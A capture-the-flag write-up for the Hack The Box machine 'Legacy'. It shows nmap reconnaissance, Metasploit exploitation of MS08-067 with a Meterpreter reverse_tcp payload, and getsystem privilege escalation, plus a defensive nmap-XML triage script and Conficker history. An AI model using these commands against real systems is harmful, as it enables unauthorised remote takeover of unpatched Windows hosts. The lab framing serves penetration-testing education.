
Legacy

Another very easy machine — Legacy is similar to Blue. It shows how quickly a critical vulnerability, left unpatched, can be used to exploit a system in a matter of minutes.

Write Up

Setup

First setup to stay organized:

$ mkdir legacy
$ mkdir legacy/www legacy/nmap legacy/gobuster

Reconnaissance

Initial nmap scan

$ nmap -sC -sV 10.10.10.4 -oA nmap/legacy
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-11 16:05 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.48 seconds

Looks like it's blocking Nmap's host-discovery probes. We can confirm the host is really up, since we can ping the machine:

$ ping 10.10.10.4
PING 10.10.10.4 (10.10.10.4) 56(84) bytes of data.
64 bytes from 10.10.10.4: icmp_seq=1 ttl=127 time=83.4 ms
64 bytes from 10.10.10.4: icmp_seq=2 ttl=127 time=80.7 ms

Let's add the -Pn option, which skips host discovery and treats every host as online:

$ nmap -sC -sV -Pn 10.10.10.4 -oA nmap/legacy
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-11 16:04 EDT
Nmap scan report for 10.10.10.4
Host is up (0.085s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -4h25m24s, deviation: 2h07m16s, median: -5h55m24s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:1a:2f (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2021-04-11T20:09:25+03:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.99 seconds

Searching for Windows XP (Windows 2000 LAN Manager) on Google, one of the first results is for people writing about MS08-067. From the Microsoft Security Bulletin:

The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code.
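The same judgement can be automated from the XML report that `-oA nmap/legacy` writes (nmap/legacy.xml), which is useful when triaging a whole subnet rather than one box. This is an added example, not part of the original write-up; the XML below is constructed to mirror the scan above and keeps only the elements the triage reads.

```python
# Flag hosts that look like Legacy: an end-of-life Windows release (the
# releases MS08-067 names as exploitable unauthenticated) exposing SMB on
# 445, and report whether SMB message signing is enforced.
import xml.etree.ElementTree as ET

# Constructed sample mirroring the nmap -oA XML for 10.10.10.4 on this page,
# plus a patched Windows 10 host as a negative case.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
 <host><address addr="10.10.10.4" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
  <hostscript>
   <script id="smb-os-discovery"><elem key="os">Windows XP (Windows 2000 LAN Manager)</elem></script>
   <script id="smb-security-mode"><elem key="message_signing">disabled</elem></script>
  </hostscript>
 </host>
 <host><address addr="10.10.10.5" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
  <hostscript>
   <script id="smb-os-discovery"><elem key="os">Windows 10 Pro 19041</elem></script>
   <script id="smb-security-mode"><elem key="message_signing">required</elem></script>
  </hostscript>
 </host>
</nmaprun>"""

LEGACY_OS = ("windows 2000", "windows xp", "windows server 2003")


def script_elem(host, script_id, key):
    """Value of <elem key=...> under the named NSE script, or None if absent."""
    for script in host.iter("script"):
        if script.get("id") == script_id:
            elem = script.find(f"elem[@key='{key}']")
            return elem.text if elem is not None else None
    return None


def triage(xml_text):
    """Return [(ip, os, signing)] for hosts with 445 open and a legacy OS."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        ip = host.find("address[@addrtype='ipv4']").get("addr")
        smb_open = any(p.get("portid") == "445" and p.find("state").get("state") == "open"
                       for p in host.iter("port"))
        os_name = script_elem(host, "smb-os-discovery", "os") or ""
        signing = script_elem(host, "smb-security-mode", "message_signing") or "unknown"
        if smb_open and any(tag in os_name.lower() for tag in LEGACY_OS):
            findings.append((ip, os_name, signing))
    return findings
```

Each finding is a host to patch or isolate; the signing value is reported because "disabled (dangerous, but default)" is a second weakness on the same service.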

Exploit

Let's use the MS08-067 module in Metasploit:

$ msfconsole -q
msf6 > search MS08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 > use 0

Setting up Metasploit:

msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.4 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.14.10:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.10:4444 -> 10.10.10.4:1029) at 2021-04-11 16:47:05 -0400
meterpreter >

And we have a shell! We can escalate our privileges with Meterpreter:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Now we can find the flags.

meterpreter > search -f root.txt
Found 1 result...
c:\Documents and Settings\Administrator\Desktop\root.txt (32 bytes)
meterpreter > cd Documents\ and\ Settings\john\Desktop
meterpreter > cat user.txt
meterpreter > cd C:\Documents and Settings\Administrator\Desktop
meterpreter > cat root.txt

Beyond the Box

History

In October 2008, Microsoft released a security bulletin for a critical bug they classified as MS08-067, which allowed remote code execution through a crafted RPC request. It was used in various attacks, perhaps most notably the Conficker worm.

Conficker infected an estimated 9 to 15 million Microsoft servers, including systems belonging to the French Navy and the UK Ministry of Defence. At the time it was the largest known computer worm infection.

Different variants (A through E) of the worm propagated, defended themselves, and ended differently. However, they all shared one initial infection vector: MS08-067.

In 2011, the Ukrainian police and the FBI arrested three Ukrainians and a Swede in connection with Conficker.

Read the Wikipedia article on Conficker here.

The Exploit

Like EternalBlue, the exploit comes down to a buffer overflow. An example exploit can be found here.